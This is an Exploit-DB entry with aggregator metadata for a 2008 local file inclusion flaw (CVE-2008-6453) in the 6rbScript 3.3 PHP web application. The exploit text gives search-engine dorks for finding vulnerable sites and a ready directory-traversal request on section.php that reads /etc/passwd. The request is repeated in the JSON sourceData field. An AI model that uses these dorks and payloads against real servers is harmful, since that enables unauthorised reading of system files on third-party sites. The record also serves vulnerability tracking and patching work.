ID EDB-ID:6520
Type exploitdb
Reporter Stack
Modified 2008-09-21T00:00:00
Description
6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability. CVE-2008-6453. Webapps exploit for php platform
|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
| |
|
| script : www.6rbscript.com
|
| DorK : inurl:"section.php?name=singers"
| dorK : Powered By 6rbScript V3.3
|___________________________________________________|
Author : Stack
Expl need magic quote = off & open basdir = off in many server
site.il/section.php?name=../../../../etc/passwd
# milw0rm.com [2008-09-21]
{"id": "EDB-ID:6520", "hash": "fe69d7443fe702f9321f02db38bd17af", "type": "exploitdb", "bulletinFamily": "exploit", "title": "6rbScript 3.3 section.php name Local File Inclusion Vulnerability", "description": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability. CVE-2008-6453. Webapps exploit for php platform", "published": "2008-09-21T00:00:00", "modified": "2008-09-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/6520/", "reporter": "Stack", "references": [], "cvelist": ["CVE-2008-6453"], "lastseen": "2016-02-01T00:02:27", "history": [], "viewCount": 16, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6453"]}], "modified": "2016-02-01T00:02:27"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6520/", "sourceData": "|___________________________________________________|\n|\n| 6rbScript V3.3 Local file Vulnerability\n|\n|___________________________________________________\n| |\n|\n| script : www.6rbscript.com\n|\n| DorK : inurl:\"section.php?name=singers\"\n| dorK : Powered By 6rbScript V3.3\n|___________________________________________________|\n \nAuthor : Stack\n \nExpl need magic quote = off & open basdir = off in many server\n \nsite.il/section.php?name=../../../../etc/passwd\n\n# milw0rm.com [2008-09-21]\n", "osvdbidlist": ["48508"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:26:20", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in section.php in 6rbScript 3.3, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the name parameter.", "modified": "2017-09-28T21:33:10", "published": "2009-03-13T06:30:00", "id": "CVE-2008-6453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6453", "title": "CVE-2008-6453", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
